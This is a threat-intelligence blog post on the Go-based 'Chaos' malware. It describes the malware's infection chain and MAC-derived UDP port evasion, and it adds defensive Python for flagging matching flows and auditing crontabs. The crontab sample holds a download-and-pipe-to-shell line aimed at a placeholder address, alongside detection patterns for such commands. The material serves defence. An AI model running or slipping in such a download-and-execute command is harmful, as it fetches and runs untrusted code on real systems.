September 28, 2022
CTIG Coverage of Black Lotus Labs’ Chaos Malware Report
Note: This blog post discusses active research by third parties into an ongoing threat. This information should be considered preliminary and will be updated as research continues.
On September 28, 2022, the threat intelligence team at Lumen’s Black Lotus Labs published research into a novel, multifunctional Go-based malware that targets a remarkable array of architectures, from Linux servers to Microsoft systems, IoT devices, and SOHO routers. The malware not only runs across multiple environments but is also equipped with just as many functions, from cryptomining to DDoS attacks to serving as an initial access vector.
Evolution of the Go Programming Language
The Go programming language was introduced in 2009 by designers at Google, specifically to operate across common platforms and highly networked systems with large codebases. Often referred to as “Golang,” it was released to the public in 2012. The language is a boon to programmers working with cloud applications and underpins popular projects such as Docker and Kubernetes. However, it did not take long for the first Go-based malware to surface; one was detected that same year.
Malware written in C, and later Python, remains dominant even today, but by 2019 samples written in Go began turning up in discovery more frequently. The adaptability of the language would not go overlooked by threat actors and criminals for long; by 2020 roughly 10,000 samples had been found in the wild. Because it is not yet as popular as the classics, Go is still difficult to reverse-engineer and analyze, and many AV systems struggle to detect it. Detection rates remain very low, which makes it attractive as the foundation for Command-and-Control (C2) networks, botnets, DDoS, and cryptomining. It has now become popular for e-crime and ransomware and, as the Black Lotus report shows, for general-purpose malware with a high degree of sophistication and adaptability.
Discovery of the “Chaos” Malware
Using telemetry from the Lumen global network, Black Lotus discovered and analyzed 100 samples of this malware, which were written in Chinese and used a China-based C2 infrastructure. Enumerating that infrastructure led to the targets of several distinct Chaos clusters, including a successful compromise of a GitLab server and a spate of recent DDoS attacks against the gaming, financial services and technology, and media and entertainment industries. The targets included a DDoS-as-a-service provider and a cryptocurrency exchange. Chaos represents an advanced stage in the evolution of Golang malware, designed to work across several architectures, including ARM, Intel (i386), MIPS, and PowerPC, and on both Windows and Linux operating systems. And unlike many botnets that spread through spam, Chaos proliferates by exploiting known CVEs and by using stolen or brute-forced SSH keys.
During their analysis, Black Lotus found source file names incorporating the word “Chaos,” references to Chaos in various function names, and the same name embedded in self-signed X.509 certificates. Their assessment of similarities in code and function leads them to believe this is an evolution of a previously known Go-based DDoS malware called Kaiji; the campaign is distinct from the ransomware that shares the Chaos name.
Technical Analysis of the Chaos Infection Chain
As the figure below illustrates, the Chaos infection chain can be summarized as follows: the malware is installed on a host device, establishes persistence, and beacons out to the embedded C2. Depending on the environment, the host receives one or more staging commands, which direct it either to exploit an applicable CVE or to leverage or brute-force SSH keys, and to begin IP spoofing. Again depending on the host, the subsequent execution commands direct propagation through the CVE to specified target lists and further exploitation of those targets: launching DDoS attacks, beginning cryptomining, or simply serving as the initial access for a follow-on ransomware program.
The devil is in the details, and the designers of this malware paid attention to them. Their efforts to remain undetected include a crafty piece of code that determines the UDP port from which the malware reaches out. Using the first few digits of the host’s MAC address as a key, it converts them to hex and takes those digits as the designated port. This is likely an extra step taken to avoid hard-coding a port in the binary, further shielding the malware from analysis.
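A defender can turn this detail into a correlation check: compute the port the scheme would derive from each host’s MAC address and look for outbound UDP flows that use it as their source port. The following is an added example, not code from Black Lotus Labs or from this post, and it makes one labelled assumption: the report summary says only that “the first few” digits of the MAC are used, so the helper reads the first four hexadecimal digits of the MAC (a 16-bit value, the widest that still fits a port number) as the port; the `MAC_HEX_DIGITS` constant, the `mac_derived_port` and `flag_matching_udp_flows` function names, and the host inventory and flow records are all constructed for the example.

```python
import re
from typing import Dict, Iterable, List

# Assumption: the post says the port is taken from "the first few numbers" of
# the host's MAC address, read as hex. The exact width is not stated, so this
# helper uses the first four hex digits. Change MAC_HEX_DIGITS to test another
# width against a sample you are analysing.
MAC_HEX_DIGITS = 4


def mac_derived_port(mac: str, digits: int = MAC_HEX_DIGITS) -> int:
    """Return the UDP port the described scheme would derive from a MAC address.

    Accepts the usual separators (aa:bb:cc:dd:ee:ff, aa-bb-cc-dd-ee-ff,
    aabb.ccdd.eeff). MAC digits are already hexadecimal, so "converting to hex"
    amounts to reading the leading digits as a base-16 integer. A MAC that
    begins with enough zeros yields 0, which no real flow will ever match.
    """
    hex_digits = re.sub(r"[^0-9a-fA-F]", "", mac)
    if len(hex_digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return int(hex_digits[:digits], 16)


def flag_matching_udp_flows(mac_by_host: Dict[str, str],
                            flows: Iterable[Dict]) -> List[Dict]:
    """Return outbound UDP flows whose source port equals the MAC-derived port
    of the originating host.

    A match is a weak signal on its own: an ephemeral port can collide with the
    derived value by chance, so treat a hit as a pivot for further checks
    (destination IoCs, process lineage) rather than as a verdict.
    """
    expected = {host: mac_derived_port(mac) for host, mac in mac_by_host.items()}
    return [
        flow for flow in flows
        if flow["proto"] == "udp" and expected.get(flow["src_host"]) == flow["src_port"]
    ]


# Constructed sample data: a two-host inventory and a handful of flow records.
HOST_MACS = {
    "srv-01": "a4:5e:60:12:34:56",   # first four hex digits a45e -> 42078
    "iot-02": "00:1b:44:11:3a:b7",   # first four hex digits 001b -> 27
}
SAMPLE_FLOWS = [
    {"src_host": "srv-01", "proto": "udp", "src_port": 42078, "dst": "203.0.113.10", "dst_port": 53},
    {"src_host": "srv-01", "proto": "tcp", "src_port": 42078, "dst": "203.0.113.10", "dst_port": 443},
    {"src_host": "srv-01", "proto": "udp", "src_port": 51234, "dst": "203.0.113.11", "dst_port": 123},
    {"src_host": "iot-02", "proto": "udp", "src_port": 27,    "dst": "203.0.113.12", "dst_port": 4444},
]

if __name__ == "__main__":
    for flow in flag_matching_udp_flows(HOST_MACS, SAMPLE_FLOWS):
        print(f"{flow['src_host']} udp/{flow['src_port']} -> {flow['dst']}:{flow['dst_port']}")
```

The flow records are deliberately minimal; in practice you would feed NetFlow or Zeek `conn.log` rows joined against your asset inventory, and only escalate hits whose destination also appears on the report’s IoC list.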
In addition to the new functions displayed by Chaos, the malware retains capabilities previously seen in the original Kaiji botnet: establishing a reverse shell, initiating cryptomining, and launching DDoS attacks. And while the original botnet was designed to run on Linux servers, the modifications here take full advantage of the Go language, enabling its use on many more platforms and with more versatility within those platforms.
For an exhaustive technical breakdown of the capabilities of Chaos, refer to the full report by Black Lotus Labs.
Guidance for Chaos
What makes Chaos dangerous is that it takes advantage of the “natural camouflage” that writing in Go provides. Compounding this, most users of small office/home office (SOHO) routers are unaccustomed to updating and patching their systems.
For those who are familiar with their routers, large and small: continue to examine crontabs for abnormal entries, monitor for abnormal processes, and above all, practice asset management, which plays a key role. Discovering which assets are unpatched or not regularly monitored is a never-ending task for a defender, and neglected assets are a field of opportunity for attackers such as these.
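The crontab review recommended above is easy to automate on Linux hosts that expose a shell. The following is an added example, not code from Black Lotus Labs or from this post: it parses crontab text into entries and flags the patterns that most often mark a planted persistence job (running at every boot, executing from a world-writable temp directory, hidden dot-paths, and downloads piped straight into a shell). The heuristics, the `parse_crontab` and `audit_crontab` names, and the sample crontab are all constructed for the example; the sample’s download address is a documentation (TEST-NET-2) value, not an indicator from the report.

```python
import re
from typing import List, NamedTuple


class CronEntry(NamedTuple):
    schedule: str   # five time fields, or a shortcut such as @reboot
    command: str


class Finding(NamedTuple):
    entry: CronEntry
    reasons: List[str]


# Heuristics applied to the command part of each entry: (pattern, reason reported).
COMMAND_HEURISTICS = [
    (re.compile(r"(^|[\s=;|&])/(tmp|var/tmp|dev/shm)/"),
     "executes from a world-writable temp directory"),
    (re.compile(r"/\.[^/\s]+"),
     "references a hidden (dot) path"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
     "pipes a download straight into a shell"),
    (re.compile(r"\bbase64\b.*(-d|--decode)\b"),
     "decodes base64 inline"),
]


def parse_crontab(text: str) -> List[CronEntry]:
    """Parse crontab text into (schedule, command) pairs.

    Comments, blank lines and VAR=value assignments are skipped. Shortcut
    schedules (@reboot, @daily, ...) are a single token; the classic form has
    five time fields before the command.
    """
    entries: List[CronEntry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
            if len(parts) == 2:
                entries.append(CronEntry(parts[0], parts[1]))
            continue
        parts = line.split(None, 5)
        if len(parts) == 6:
            entries.append(CronEntry(" ".join(parts[:5]), parts[5]))
    return entries


def audit_crontab(text: str) -> List[Finding]:
    """Return the entries that trip one or more heuristics, with the reasons."""
    findings: List[Finding] = []
    for entry in parse_crontab(text):
        reasons: List[str] = []
        if entry.schedule == "@reboot":
            reasons.append("runs at every boot (a common persistence choice)")
        for pattern, reason in COMMAND_HEURISTICS:
            if pattern.search(entry.command):
                reasons.append(reason)
        if reasons:
            findings.append(Finding(entry, reasons))
    return findings


# Constructed sample: two routine jobs followed by three that deserve a look.
SAMPLE_CRONTAB = """\
# constructed crontab for the example
MAILTO=root
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh
@reboot /tmp/.X11-unix/.x/run >/dev/null 2>&1
* * * * * curl -s http://198.51.100.7/d.sh | sh
30 1 * * * /home/app/.cache/.hidden/linux_amd64 &
"""

if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRONTAB):
        print(f"{finding.entry.schedule} {finding.entry.command}")
        for reason in finding.reasons:
            print(f"    - {reason}")
```

Feed it the output of `crontab -l` for each user plus the contents of `/etc/crontab` and `/etc/cron.d/*`. The hidden-path heuristic will also flag legitimate jobs under `~/.config` or similar, so read the findings as a review queue rather than an alert stream, and compare any unfamiliar binary against the IoCs in the Black Lotus report.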
Chaos primarily spreads by exploiting known vulnerabilities, so ensure effective patch management for newly disclosed CVEs. Use the IoCs listed in the original report to monitor for a Chaos infection and for connections to any suspicious infrastructure.
Consumers with SOHO routers: Follow best practices of regularly rebooting routers and installing security updates and patches. Users should leverage appropriately configured and updated EDR solutions on hosts, and regularly update software consistent with vendor patches where applicable.
Remote workers: Change default passwords and disable remote root access on machines that don’t require it. Store SSH keys securely and only on devices that need them.
Businesses should consider comprehensive Secure Access Service Edge (SASE) and DDoS mitigation protections to bolster their security postures and enable robust detection of network-based communications.
CTIG’s Look into the Future
CTIG will continue collaborating with the security research community to provide timely information on this threat as it evolves.